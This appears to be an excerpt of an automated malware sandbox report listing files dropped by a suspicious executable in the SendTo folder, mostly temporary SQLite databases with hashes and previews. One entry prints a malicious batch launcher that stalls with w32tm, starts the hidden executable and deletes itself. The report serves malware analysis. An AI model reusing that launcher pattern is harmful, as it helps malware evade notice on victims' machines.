                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\IkKPcHNrHI

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\J35cqkutHM

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\J6AWrf32cf

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\JG6WL23Kki

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\JX99Ui9DKP

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Jc3IbYoYop

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\K8Udu6ZxPG

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\KK2on2NbOl

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\KPnOeUK2hC

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Kh2I41UFhR

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\KlakMpqxk8

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\KwvyJHmJy4

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\MTs4bScagy

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\MmSbScMSiw

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\MtoON0W1Bf

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Mx1yvCWciN

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\NU0jamWTKp

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\O5gjxwzfB0

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\O7AIn1oDdE

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\OMCpYut2OS

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):221
                                          Entropy (8bit):5.202461001266817
                                          Encrypted:false
                                          SSDEEP:6:hCijTg3Nou1SV+DE1wn7qQ5ZIvKOZG1wkn23fvVN9zKn:HTg9uYDEm7R5ZIDfdGn
                                          MD5:308A2B4388BB6DF1844D88B87E5FD71A
                                          SHA1:209101B15B5E6A51CDD77E90FF6A2F800B21899D
                                          SHA-256:19634F9E2F35AE3840048DBA72A04756E1AC308BA3489FDE3BDD6433AA4FF3FA
                                          SHA-512:298C01E8C25B34E2D77B2F7B76EDD5D9B628E246346B176983CFECCA2FF0061E10C77C6EA87F208F955C4B6584F632F132FE86268CDECD8337AFA5027651A5EA
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\OO0he60sKA.bat"

                                          C:\Users\user\AppData\Local\Temp\ORcarp2G7g

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\OXRiWuigiF

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\P0jiBj3smO

